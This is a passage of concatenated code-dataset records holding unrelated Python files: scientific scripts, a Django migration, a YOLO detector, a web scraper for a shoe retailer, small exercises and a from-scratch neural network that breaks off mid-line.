F_refl_raw/(E_range_raw)\n\nbins = np.logspace(0, 1.6, 80)\ndigitized = np.digitize(E_range_raw, bins)\nE_range = np.asarray([E_range_raw[digitized == i].mean() for i in range(1, len(bins))])\ndE = np.asarray([dE_raw[digitized == i].mean() for i in range(1, len(bins))])\nF_all = np.asarray([F_all_raw[digitized == i].mean() for i in range(1, len(bins))])\nF_in = np.asarray([F_in_raw[digitized == i].mean() for i in range(1, len(bins))])\nF_out = np.asarray([F_out_raw[digitized == i].mean() for i in range(1, len(bins))])\nF_refl = np.asarray([F_refl_raw[digitized == i].mean() for i in range(1, len(bins))])\n\ndE = dE[np.logical_not(np.isnan(E_range))]\nF_all = F_all[np.logical_not(np.isnan(E_range))]\nF_in = F_in[np.logical_not(np.isnan(E_range))]\nF_out = F_out[np.logical_not(np.isnan(E_range))]\nF_refl = F_refl[np.logical_not(np.isnan(E_range))]\nE_range = E_range[np.logical_not(np.isnan(E_range))]\n\ndef emissivity1(r, r_i):\n '''\n Simple form for the disc emissivity at radius, r x R_g.\n '''\n\n return r**(-4.5)\n\ndef emissivity2(r, r_i):\n '''\n Simple form for the disc emissivity at radius, r x R_g.\n '''\n\n return r**(-3.) * 3 * (1-sqrt(2.5/r))\n\ndef r(f):\n return (2*pi*R_g * f / (B*c))**(-1/(m+(3./2.)))\n\nemissr1 = lambda r: emissivity1(r, r_i)*r\n\n#r_bins = r_bounds(r_o, r_i)\n\n#rs = np.asarray([(r_bins[i+1]+r_bins[i])/2 for i in range(len(r_bins)-1)]) \n\n#fs = np.logspace(-2, 1.4, 100)\n\n#rs = r(fs)\n#r_i = min(rs)\n#r_o = max(rs)\n\n#fs = f_alpha(rs, B, m)\n\nYs = np.array(())\n\nfor i in range(len(rs)):\n #tot = (np.sum((ems1 * rs * drs)[i:]) / np.sum((ems1 * rs * drs)))**2\n \n #Ys = np.append(Ys, tot)\n r = rs[i]\n if r > 8.7:\n \n num = integrate.quad(emissr1, r_i, 8.7)[0] * integrate.simps(F_in_raw, E_range_raw) + integrate.quad(emissr1, 8.7, r)[0] * integrate.simps(F_out_raw, E_range_raw)\n denom = integrate.quad(emissr1, 8.7, r_o)[0]*integrate.simps(F_out_raw, E_range_raw) + integrate.quad(emissr1, r_i, 8.7)[0]*integrate.simps(F_in_raw, E_range_raw)\n Ys = np.append(Ys, num/denom)\n \n if r < 8.7:\n \n num = integrate.quad(emissr1, r_i, r)[0] * integrate.simps(F_in_raw, E_range_raw)\n denom = integrate.quad(emissr1, 8.7, r_o)[0]*integrate.simps(F_out_raw, E_range_raw) + integrate.quad(emissr1, r_i, 8.7)[0]*integrate.simps(F_in_raw, E_range_raw)\n Ys = np.append(Ys, num/denom)\n\nfs = f_alpha(rs, B, m)\n\n\nemissr2 = lambda r: emissivity2(r, r_i)*r\nZs = np.array(())\n\nfor i in range(len(rs)):\n\n r = rs[i]\n if r > 8.7:\n \n num = integrate.quad(emissr2, r_i, 8.7)[0] * integrate.simps(F_in_raw, E_range_raw) + integrate.quad(emissr2, 8.7, r)[0] * integrate.simps(F_out_raw, E_range_raw)\n denom = integrate.quad(emissr2, 8.7, r_o)[0]*integrate.simps(F_out_raw, E_range_raw) + integrate.quad(emissr2, r_i, 8.7)[0]*integrate.simps(F_in_raw, E_range_raw)\n Zs = np.append(Zs, num/denom)\n \n if r < 8.7:\n \n num = integrate.quad(emissr2, r_i, r)[0] * integrate.simps(F_in_raw, E_range_raw)\n denom = integrate.quad(emissr2, 8.7, r_o)[0]*integrate.simps(F_out_raw, E_range_raw) + integrate.quad(emissr2, r_i, 8.7)[0]*integrate.simps(F_in_raw, E_range_raw)\n Zs = np.append(Zs, num/denom)\n \nf, ax = plt.subplots()\n\nax.plot(fs, Ys**2)\nax.plot(fs, Zs**2)\nax.set_ylim(0.0003, 1.5)\nax.set_xlim(0.021,34.7)\nax.set_yscale('log')\nax.set_xscale('log')\nax.set_ylabel(r'$F$')\nax.set_xlabel(r'$f$ $(Hz)$')\n\n\nplt.show()","sub_path":"Archive/filterfunction_withenergyspectra.py","file_name":"filterfunction_withenergyspectra.py","file_ext":"py","file_size_in_byte":4031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"424443037","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('posts', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='myuser',\n name='favourites_users',\n field=models.ManyToManyField(related_name='followers', verbose_name='\\u0418\\u0437\\u0431\\u0440\\u0430\\u043d\\u043d\\u044b\\u0435 \\u043f\\u043e\\u043b\\u044c\\u0437\\u043e\\u0432\\u0430\\u0442\\u0435\\u043b\\u0438', to=settings.AUTH_USER_MODEL, blank=True),\n ),\n migrations.AddField(\n model_name='post',\n name='scores',\n field=models.IntegerField(default=0, verbose_name='\\u041f\\u0440\\u043e\\u0441\\u043c\\u043e\\u0442\\u0440\\u044b'),\n ),\n ]\n","sub_path":"posts/migrations/0002_auto_20151211_0654.py","file_name":"0002_auto_20151211_0654.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185308049","text":"\"\"\"\nПоследовательность Фибоначчи определяется так:\n0,1,1,2,3,5,8...F_{n}=F_{n-2}+F_{n-1}.\nПо данному числу n определите n-е число Фибоначчи.\n0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987 ...\n\"\"\"\n\nn = int(input('n: '))\n\np = 1 # pred chislo\ne = 1 # eto\ns = 0 # sled\ns2 = 0 # sled 2\n\nfor i in range(n):\n p = e\n e = s2\n s = p + e\n s2 = s\n\nprint(s)\n","sub_path":"mccme/07-while/07-17.py","file_name":"07-17.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"574763350","text":"#!/usr/bin/env python3\n\nimport os\nimport os.path\nimport time\nimport numpy as np\nimport cv2\n\nclass Yolo(object):\n\n labels_path = 'coco.names'\n weights_path = 'yolov3.weights'\n config_path = 'yolov3.cfg'\n confidence = 0.5 # Minimum probability to filter out detections\n threshold = 0.3 # Threshold when applying non-maxima suppression\n\n def __init__(self):\n\n if not os.path.isfile(self.weights_path):\n print(\"Assembling {} file...\".format(self.weights_path))\n os.system('cat {0}.* > {0}'.format(self.weights_path))\n\n # Load the COCO class labels that the YOLO model was trained on\n self.labels = open(self.labels_path).read().strip().split('\\n')\n\n # Initialize a list of colors to represent each possible class label\n np.random.seed(42)\n self.colors = np.random.randint(0, 255, size=(len(self.labels), 3), dtype='uint8')\n\n # Load the YOLO object detector trained on the COCO dataset (80 classes)\n self.net = cv2.dnn.readNetFromDarknet(self.config_path, self.weights_path)\n\n # Determine the output layer names that are needed from YOLO\n self.ln = self.net.getLayerNames()\n self.ln = [self.ln[i[0] - 1] for i in self.net.getUnconnectedOutLayers()]\n\n def run(self, image):\n\n # Construct a blob from the image and perform a forward pass of the object detector\n blob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416), swapRB=True, crop=False)\n self.net.setInput(blob)\n start = time.time()\n layerOutputs = self.net.forward(self.ln)\n end = time.time()\n print('YOLO took {:.6f} seconds'.format(end - start))\n\n # Initialize lists of detected bounding boxes, confidences, and class IDs\n boxes = []\n confidences = []\n classIDs = []\n\n (H, W) = image.shape[:2]\n for output in layerOutputs:\n for detection in output:\n scores = detection[5:]\n classID = np.argmax(scores)\n confidence = scores[classID]\n if confidence > self.confidence:\n # Scale the bounding box coordinates back relative to the size of the image\n box = detection[0:4] * np.array([W, H, W, H])\n (centerX, centerY, width, height) = box.astype('int')\n # Derive the top left corner of the bounding box\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n # Update the list of bounding box coordinates, confidences, and class IDs\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n classIDs.append(classID)\n\n # Apply non-maxima suppression to suppress weak, overlapping bounding boxes\n idxs = cv2.dnn.NMSBoxes(boxes, confidences, self.confidence, self.threshold)\n\n # Ensure at least one detection exists and loop over the indexes we are keeping\n if len(idxs) > 0:\n for i in idxs.flatten():\n # Extract the bounding box coordinates\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n # Draw a bounding box rectangle and label on the image\n color = [int(c) for c in self.colors[classIDs[i]]]\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 2)\n text = '{}: {:.4f}'.format(self.labels[classIDs[i]], confidences[i])\n cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\nif __name__ == '__main__':\n yolo = Yolo()\n\n # Load and run the input image\n image = cv2.imread('baggage_claim.jpg')\n yolo.run(image)\n\n # Display the output image\n cv2.imshow('Image', image)\n cv2.waitKey(10000)\n","sub_path":"yolo/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"29946736","text":"import math\n\ndef SETUPT(Magboltz):\n Magboltz.API = math.acos(-1.0)\n TWOPI = 2.0 * Magboltz.API\n Magboltz.ARY = 13.60569253\n PIR2 = 8.7973554297e-17\n ECHARG = 1.602176565e-19\n EMASS = 9.10938291e-31\n AMU = 1.660538921e-27\n BOLTZ = 8.6173324e-5\n BOLTZJ = 1.3806488e-23\n AWB = 1.758820088e10\n ALOSCH = 2.6867805e19\n EOVM = math.sqrt(2.0 * ECHARG / EMASS) * 100.0\n ABZERO = 273.15\n ATMOS = 760.0\n Magboltz.CONST1 = AWB / 2.0 * 1.0e-19\n Magboltz.CONST2 = Magboltz.CONST1* 1.0e-02\n Magboltz.CONST3 = math.sqrt(0.2 * AWB) * 1.0e-9\n Magboltz.CONST4 = Magboltz.CONST3 * ALOSCH * 1.0e-15\n Magboltz.CONST5 = Magboltz.CONST3 / 2.0\n Magboltz.CORR = ABZERO * Magboltz.TORR / (ATMOS * (ABZERO + Magboltz.TEMPC) * 100.0)\n Magboltz.NANISO =2\n Magboltz.NCOLM = 400000\n Magboltz.NCORLN = 50000\n Magboltz.NCORST = 4\n MXEKR = 0\n for IH in range(Magboltz.NGAS):\n if Magboltz.NGASN[IH] == 2 or Magboltz.NGASN[IH] == 6 or Magboltz.NGASN[IH] == 7:\n MXEKR = IH\n if Magboltz.EFIELD > (10 / Magboltz.CORR):\n MXEKR = -1\n if MXEKR != -1:\n if Magboltz.NGAS == 1:\n Magboltz.NCOLM = 2000000\n Magboltz.NCORLN = 500000\n Magboltz.NCORST = 2\n elif Magboltz.FRAC[MXEKR] > 90.0:\n Magboltz.NCOLM = 2000000\n Magboltz.NCORLN = 500000\n Magboltz.NCORST = 2\n TOTFRAC = 0.0\n if Magboltz.NGAS == 0 or Magboltz.NGAS > 6:\n raise ValueError(\"Error in Gas Input\")\n\n for J in range(Magboltz.NGAS):\n if Magboltz.NGASN[J] == 0 or Magboltz.FRAC[J] == 0:\n raise ValueError(\"Error in Gas Input\")\n TOTFRAC += Magboltz.FRAC[J]\n if abs(TOTFRAC - 100) >= 1e-6:\n raise ValueError(\"Error in Gas Input\")\n Magboltz.TMAX = 100.0\n NSCALE = 40000000\n Magboltz.NMAX = Magboltz.NMAX * NSCALE\n\n if Magboltz.NMAX < 0:\n raise ValueError(\"NMAX value is too large - overflow\")\n Magboltz.NSTEP = 4000\n Magboltz.THETA = 0.785\n Magboltz.PHI = 0.1\n Magboltz.ESTART = Magboltz.EFINAL / 50.0\n Magboltz.RSTART=0.666\n Magboltz.CORR = ABZERO * Magboltz.TORR / (ATMOS * (ABZERO + Magboltz.TEMPC) * 100.0)\n\n Magboltz.AKT = (ABZERO + Magboltz.TEMPC) * BOLTZ\n Magboltz.ANN = [Magboltz.FRAC[i] * Magboltz.CORR * ALOSCH for i in range(6)]\n Magboltz.AN = 100.0 * Magboltz.CORR * ALOSCH\n Magboltz.VANN = [Magboltz.FRAC[i] * Magboltz.CORR * Magboltz.CONST4 * 1e15 for i in range(6)]\n Magboltz.VAN = 100.0 * Magboltz.CORR * Magboltz.CONST4 * 1.0e15\n\n Magboltz.WB = AWB * Magboltz.BMAG * 1e-12\n\n if Magboltz.BMAG == 0:\n return\n Magboltz.EOVB = Magboltz.EFIELD *1e-9/Magboltz.BMAG\n return\n","sub_path":"src/Scripts/Python/SETUPT.py","file_name":"SETUPT.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"177032751","text":"import time\nfrom scrapy.http import Request\nfrom datetime import datetime\nfrom selenium import webdriver\nfrom scrapy.selector import Selector\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom esmio.items import Item\n\nfrom pymongo import MongoClient\n\nfrom text_parser import price_normalize, html_text_normalize\n\nfrom esmio.spiders.miocrawler import MioCrawler\n\nclass BenditoPie(MioCrawler):\n name = 'benditopie'\n allowed_domains = ['benditopie.com']\n\n start_urls = ['https://benditopie.com/collections/zapatos-1?page=' + str(i) for i in range(1,7)]\n \n rules = [\n # Rule(LinkExtractor(restrict_xpaths=\"//a[@class='f-linkNota']\"), callback='parse_item', follow=True)\n # Rule(LinkExtractor(allow_domains=allowed_domains), callback='parse_item', follow=True)\n ]\n\n def parse(self, response):\n print(\"------------- Crawling ----------------\")\n self.browser.get(response.url)\n sel = Selector(text=self.browser.page_source)\n links = sel.xpath('.//a[@class=\"product-image view-alt\"]/@href')\n for link in links:\n url_txt = 'https://benditopie.com/' + link.extract()\n print(\"------------Found new link: \"+str(url_txt))\n yield Request(url_txt, callback=self.parse_item)\n\n def parse_item(self, response):\n if self.links.find_one({\"_id\": response.url}) is None:\n print(\"------------- New Item ----------------\")\n self.browser.get(response.url)\n time.sleep(2)\n source = self.browser.page_source\n sel = Selector(text=source)\n item = Item()\n item['created_at'] = datetime.now()\n item['url'] = response.url\n item['brand'] = 'benditopie'\n item['breadcrumb'] = []\n item['title'] = sel.xpath('.//h1[@itemprop=\"name\"]/text()').extract()[0]\n item['description'] = html_text_normalize(sel.xpath('.//div[@itemprop=\"description\"]//span/text()').extract())\n item['code'] = ''\n item['price'] = price_normalize(sel.xpath('.//span[@itemprop=\"price\"]/text()').extract()[0])\n size_labels = sel.xpath('.//select[@id=\"ProductSelect-product-template\"]/option[not(contains(text(),\"gotado\"))]/text()').extract()\n item['sizes'] = [label.strip()[:2] for label in size_labels]\n image_urls = sel.xpath('.//ul[@id=\"ProductThumbs-product-template\"]/li/a/@href').extract()\n item['image_urls'] = [url[2:] for url in image_urls]\n yield item\n else:\n print(\"-------------- OLD -------------\")","sub_path":"esmio/spiders/benditopie.py","file_name":"benditopie.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"406625828","text":"import os\nfrom shutil import copyfile, move\n\n# flip along z-axis\n# image000 --> image max\n\nsrc_dir = '/home/hyoseok/research/medical/aaa/dataset/'\ntgt_dir = '/home/hyoseok/research/medical/aaa/dataset/'\n\ndir_list = os.listdir(src_dir + '/raw')\n\nfor entry in dir_list:\n file_list = os.listdir(src_dir + '/raw/' + entry)\n file_list_inv = os.listdir(src_dir + '/raw/' + entry)\n file_list.sort()\n file_list_inv.sort(reverse=True)\n num_files = len(file_list)\n\n if not os.path.exists(src_dir + '/raw_zinv/' + entry):\n os.makedirs(src_dir + '/raw_zinv/' + entry)\n\n\n for i in range(num_files):\n name1 = file_list[i]\n name2 = file_list_inv[i]\n print('%s --> %s'%(name1, name2))\n\n src_name = src_dir + '/raw/' + entry + '/' + name1\n tgt_name = src_dir + '/raw_zinv/' + entry + '/' + name2\n\n print(src_name)\n print(tgt_name)\n\n copyfile(src_name, tgt_name)\n\n\n\n # for f in file_list:\n","sub_path":"dataset_manipulation/z_inversion.py","file_name":"z_inversion.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"494151973","text":"import pygame\nfrom pygame.locals import *\nSCREEN=[800,600]\nscreen = pygame.display.set_mode(SCREEN,0,32)\nCOLOR = [255,255,255]\nscreen.fill(COLOR)\ndoraemon = pygame.image.load(\"resources/images/doraemon.jpg\")\nx,y = 120,90\nx_offset,y_offset = 0,0\nwhile True :\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:\n\t\t\texit()\n\t\tif event.type == KEYDOWN:\n\t\t\tif event.key == K_a:\n\t\t\t\tx_offset = -5\n\t\t\telif event.key == K_d:\n\t\t\t\tx_offset = +5\n\t\t\telif event.key == K_w:\n\t\t\t\ty_offset = -5\n\t\t\telif event.key == K_s:\n\t\t\t\ty_offset = +5\n\t\t\n\t\telif event.type == KEYUP:\n\t\t\tx_offset = 0\n\t\t\ty_offset = 0\n\t\tx+= x_offset\n\t\ty+= y_offset\n\t\tscreen.blit(doraemon,[x,y])\n\t\tpygame.display.flip()\n\n\n\n\n","sub_path":"key.py","file_name":"key.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"165405881","text":"'''\nCreated on 12.07.2015\n\n@author: Aaron Klein\n'''\nimport numpy as np\n\nfrom robo.task.base_task import BaseTask\n\n\nclass Bohachevsky(BaseTask):\n\n def __init__(self):\n X_lower = np.array([-100, -100])\n X_upper = np.array([100, 100])\n opt = np.array([[0, 0]])\n fopt = 0.0\n super(Bohachevsky, self).__init__(X_lower, X_upper, opt, fopt)\n\n def objective_function(self, x):\n y = 0.7 + x[:, 0] ** 2 + 2.0 * x[:, 1] ** 2\n y -= 0.3 * np.cos(3.0 * np.pi * x[:, 0])\n y -= 0.4 * np.cos(4.0 * np.pi * x[:, 1])\n return y[:, np.newaxis]\n\n def objective_function_test(self, x):\n return self.objective_function(x)\n","sub_path":"RoBO/build/lib.linux-x86_64-2.7/robo/task/synthetic_functions/bohachevsky.py","file_name":"bohachevsky.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"340014683","text":"def isSevenRelated( num ):\n if num%7 == 0:\n return True\n\n while num != 0:\n if num%10 == 7:\n return True\n num //= 10\n return False\n\nif __name__ == \"__main__\":\n\n res = [0]\n for i in range(1,10**6+1):\n if isSevenRelated(i):\n res.append(res[i-1])\n else:\n res.append(res[i-1]+i*i)\n \n T = int(input())\n for t in range(T):\n print( res[int(input())] )\n \n","sub_path":"01/1082.py","file_name":"1082.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"388671809","text":"\nimport os\nimport sys\nimport time\nimport logging\nimport argparse\nimport pandas as pd\n\nstart = time.clock()\n\ndef pca_parser():\n parser = argparse.ArgumentParser('pca', description='Y-haplogroup tracker @ver-1.0 BY ChenHao')\n parser.add_argument('pca',\n help='Run to plot pca plot.')\n parser.add_argument('-i', '--input', required=True, type=str, nargs='+',\n help='input: Input hap or extra file.')\n parser.add_argument('-o', '--output', required=False, type=str, nargs=1, action='store',\n help='output: Output haplogroup file.')\n parser.add_argument('-m', '--mode', required=False, type=str, nargs=1, default=['smart'], choices=['rough', 'smart', 'accurate'],\n help='missing rate: Set missing rate to filter female samples, default is 0.4')\n parser.add_argument('-t', '--type', required=False, type=str, nargs=1, default='key', choices=['key', 'final'],\n help='notes: Set whether keep the haplogroup attatching (Notes), defualt not setting.')\n parser.add_argument('-f', '--filter', required=False, action='store_true',\n help='filter: filter samples without key mutation.')\n parser.add_argument('--info', required=True, type=str, nargs=1, action='store',\n help='input: Input info file.')\n parser.add_argument('--freq', required=False, action='store_true',\n help='pcaplot: Output a pca plot.')\n\n args = parser.parse_args()\n\n return args\n\ndef judge_pca_inputfile(input_info, work_path):\n pca_inputfile_extra = None\n if os.path.isfile(input_info[0]) and input_info[0].endswith('.hap'):\n print('\\n' + '-' * 80)\n pca_inputfile = input_info[0]\n filename = os.path.split(pca_inputfile)[1]\n elif os.path.isfile(work_path + input_info[0]) and input_info[0].endswith('.hap'):\n print('\\n' + '-' * 80)\n pca_inputfile = work_path + input_info[0]\n filename = os.path.split(pca_inputfile)[1]\n else:\n print('\\n' + '-' * 80)\n print('%s is not a correct hap file, please assure file format correct.' % input_info[0])\n print('-' * 80 + '\\n')\n sys.exit()\n pca_hap_df = pd.read_table(pca_inputfile, sep='\\t', header=0, encoding='utf-8')\n if len(input_info) == 2:\n if os.path.isfile(input_info[1]) and input_info[1].endswith('.extra'):\n pca_inputfile_extra = input_info[1]\n elif os.path.isfile(work_path + input_info[1]) and input_info[1].endswith('.extra'):\n pca_inputfile_extra = work_path + input_info[1]\n else:\n print('%s is not a correct extra file, please assure file format correct.' % input_info[0])\n elif len(input_info) > 2:\n print('Please input no more than 2 file.')\n return pca_hap_df, pca_inputfile, pca_inputfile_extra, filename\n\ndef set_outputfile(output_file, work_path):\n if os.path.exists(os.path.split(output_file)[0]):\n if not output_file.endswith('.png'):\n output_file = output_file + '.png'\n return output_file\n elif os.path.split(output_file)[0] == '':\n output_file = work_path + output_file\n if not output_file.endswith('.png'):\n output_file = output_file + '.png'\n return output_file\n else:\n print('%s is not a correct path, please check it again.' % output_file)\n print('-' * 80 + '\\n')\n sys.exit()\n return output_file\n\ndef set_log(input_file, filename, args_log):\n logger = logging.getLogger()\n logger.setLevel(level=logging.INFO)\n\n handler = logging.FileHandler(input_file + '.log', mode='w')\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter('[%(asctime)s] - [%(levelname)s]: %(message)s')\n handler.setFormatter(formatter)\n\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n\n logger.addHandler(handler)\n logger.addHandler(console)\n\n log_info = ['Run Date: ' + time.asctime(time.localtime(time.time())),\n 'Filename: %s' % filename,\n 'Classifying mode: %s' % args_log.mode[0],\n 'Haplogroup type: %s' % args_log.type,\n 'Keep samples without key mutation.']\n\n if args_log.filter:\n log_info[4] = 'Filter samples without key mutation.'\n if args_log.freq:\n log_info.append('Output frequency data.')\n\n for i in log_info:\n logger.info(i)\n\ndef judge_info_file(info_file, work_path):\n if isinstance(info_file, list):\n info_file = info_file[0]\n if os.path.isfile(info_file) and info_file.endswith('.info'):\n population_file = info_file\n elif os.path.isfile(work_path + info_file) and info_file.endswith('.info'):\n population_file = info_file\n else:\n print('%s is not a correct population file, please assure file format correct.' % info_file)\n print('-' * 80 + '\\n')\n sys.exit()\n\n return population_file\n","sub_path":"PcaFileIO.py","file_name":"PcaFileIO.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"75528659","text":"\"\"\"\nReferences:\n https://medium.com/datathings/neural-networks-and-backpropagation-explained-in-a-simple-way-f540a3611f5e\n https://towardsdatascience.com/how-to-build-your-own-neural-network-from-scratch-in-python-68998a08e4f6\n\n\"\"\"\nimport numpy as np\nnp.random.seed(100)\nLOCAL = False\n\n# Activation function\ndef sigmoid(t):\n return 1 / (1 + np.exp(-t))\n\n\n# Derivative of sigmoid\ndef sigmoid_derivative(p):\n return p * (1 - p)\n\n\n# Class definition\nclass NeuralNetwork:\n def __init__(self, xTrains, yTrains, num_hidden_layer=2, num_nodes=10,\n step_size=0.05,\n momentum=0):\n self.input = np.array(xTrains) # should be flattened!\n self.y = np.array(yTrains)\n self.num_hidden_layer = num_hidden_layer\n self.num_nodes = num_nodes\n self.step_size = step_size #0.05\n self.output = np.zeros(self.y.shape)\n self.weights = []\n self.get_initial_weights()\n self.outputs = []\n self.momentum = momentum\n\n def get_initial_weights(self):\n\n for i in range(self.num_hidden_layer):\n\n if i == 0:\n num_features = len(self.input[0])\n w_dim = (num_features, self.num_nodes)\n else:\n w_dim = (self.num_nodes, self.num_nodes)\n\n if LOCAL:\n self.weights.append(np.random.rand(*w_dim))\n else:\n self.weights.append(np.random.uniform(-0.05, 0.05, w_dim))\n\n w_dim = (self.num_nodes, 1) # output layer has one node\n\n if LOCAL:\n self.weights.append(np.random.rand(*w_dim))\n else:\n self.weights.append(np.random.uniform(-0.05, 0.05, w_dim))\n\n if not len(self.weights) == (self.num_hidden_layer + 1):\n raise AssertionError(\"Weights doesn't match number of layers.\")\n\n def train(self, previous_delta_ws=[]):\n\n def get_prev_delta_w(si, wi):\n\n if not previous_delta_ws:\n return None\n return previous_delta_ws[si][wi]\n\n current_delta_ws = []\n for si, sample in enumerate(self.input):\n input = sample\n outputs = []\n for weights in self.weights:\n output = sigmoid(np.dot(input, weights))\n outputs.append(output)\n input = output\n\n # calculate error term, delta\n output_error = None\n current_delta_w = [None] * len(self.weights)\n for i in reversed(range(len(outputs))):\n if i == 0:\n input = self.input[si]\n else:\n input = outputs[i - 1]\n\n if output_error is None:\n\n output_error = sigmoid_derivative(output) * (self.y[si] - output)\n delta = np.array([input]) * output_error\n delta_w = self.step_size * delta\n self.weights[i] += delta_w.T\n current_delta_w[i] = delta_w.T\n\n else:\n error = np.dot(output_error, self.weights[i + 1].T)\n delta = sigmoid_derivative(outputs[i]) * error # (T4.4)\n # delta_w = self.step_size * np.array([[x] for x in input]) * np.array([delta])\n output_error = delta\n\n delta_w = self.step_size * delta * np.array([[x] for x in input])\n self.weights[i] += delta_w\n current_delta_w[i] = delta_w\n\n prev_delta_w = get_prev_delta_w(si, i)\n if prev_delta_w is not None:\n #print(self.weights[i].shape, prev_delta_w.shape)\n self.weights[i] += self.momentum * prev_delta_w\n current_delta_ws.append(current_delta_w)\n\n return current_delta_ws\n\n def predict(self, samples=None):\n\n if samples is None:\n samples = self.input\n predictions = []\n for sample in samples:\n input = sample\n for weights in self.weights:\n output = sigmoid(np.dot(input, weights))\n input = output\n predictions.append(output)\n return predictions\n\n def loss(self, xTests=None):\n if xTests is None:\n xTests = self.input # calculate loss with yTest\n s = np.sum(np.square(np.array(self.predict(xTests)) - np.array(xTests)))\n return 1 / 2. * s\n #return np.mean(np.square(yTests - self.feedforward()))\n\n# Class definition\nclass NeuralNetwork2:\n def __init__(self, xTrains, yTrains, num_hidden_layer=2, num_nodes=10,\n step_size=0.05):\n self.input = np.array(xTrains) # should be flattened!\n self.y = np.array(yTrains)\n self.num_hidden_layer = num_hidden_layer\n self.num_nodes = num_nodes\n self.step_size = step_size #0.05\n self.output = np.zeros(self.y.shape)\n self.weights = []\n self.get_initial_weights()\n self.outputs = []\n\n def get_initial_weights(self):\n\n for i in range(self.num_hidden_layer):\n\n if i == 0:\n num_features = len(self.input[0])\n w_dim = (num_features, self.num_nodes)\n else:\n w_dim = (self.num_nodes, self.num_nodes)\n\n if LOCAL:\n self.weights.append(np.random.rand(*w_dim))\n else:\n self.weights.append(np.random.uniform(-0.05, 0.05, w_dim))\n\n w_dim = (self.num_nodes, 1) # output layer has one node\n\n if LOCAL:\n self.weights.append(np.random.rand(*w_dim))\n else:\n self.weights.append(np.random.uniform(-0.05, 0.05, w_dim))\n\n if not len(self.weights) == (self.num_hidden_layer + 1):\n raise AssertionError(\"Weights doesn't match number of layers.\")\n\n def feedforward(self):\n\n # I tried at lest:(\n # predicted = []\n # for si, sample in enumerate(self.input):\n # input = sample\n # outputs = []\n # for weights in self.weights:\n # output = sigmoid(np.dot(input, weights))\n # outputs.append(output)\n # input = output\n #\n # predicted.append(output)\n # # calculate error term, delta\n # output_error = None\n # for i in reversed(range(len(outputs))):\n # if i == 0:\n # input = self.input[si]\n # else:\n # input = outputs[i - 1]\n #\n # if output_error is None:\n #\n # output_error = sigmoid_derivative(output) * (self.y[si] - output)\n # delta = input * output_error\n # delta_w = self.step_size * delta\n # self.weights[i] += np.array([[d] for d in delta_w])\n #\n # else:\n # error = np.dot(output_error, self.weights[i + 1].T)\n # delta = sigmoid_derivative(outputs[i]) * error # (T4.4)\n # delta_w = self.step_size * np.array([[x] for x in input]) * np.array([delta])\n # output_error = delta\n #\n # self.weights[i] += delta_w\n #\n # return np.array(predicted)\n\n # original\n self.outputs = [self.input] # initial output from input layer\n outputs = None\n for i, weights_in_layer in enumerate(self.weights):\n if i == 0:\n outputs = sigmoid(np.dot(self.input, weights_in_layer))\n else:\n outputs = sigmoid(np.dot(outputs, weights_in_layer))\n self.outputs.append(outputs)\n return self.outputs[-1]\n\n def loss(self, yTests=None):\n if yTests is None:\n yTests = self.y # calculate loss with yTest\n s = np.sum(np.square(np.array(self.feedforward()) - np.array(yTests)))\n return 1 / 2. * s\n #return np.mean(np.square(yTests - self.feedforward()))\n\n def backward(self):\n # backward propgate through the network\n # self.o_error = y - o # error in output\n # self.o_delta = self.o_error * self.sigmoidPrime(o) # applying derivative of sigmoid to error\n #\n # self.z2_error = self.o_delta.dot(self.W2.T) # z2 error: how much our hidden layer weights contributed to output error\n # self.z2_delta = self.z2_error * self.sigmoidPrime(self.z2) # applying derivative of sigmoid to z2 error\n #\n # self.W1 += X.T.dot(self.z2_delta) # adjusting first set (input --> hidden) weights\n # self.W2 += self.z2.T.dot(self.o_delta) # adjusting second set (hidden --> output) weights\n\n ## my version - no iteration\n # o_delta = sigmoid_derivative(self.output) * (self.y - self.output)\n #\n # z2_error = np.dot(o_delta, self.weights[1].T)\n # z2_delta = z2_error * sigmoid_derivative(self.outputs[1])\n #\n # delta_w1 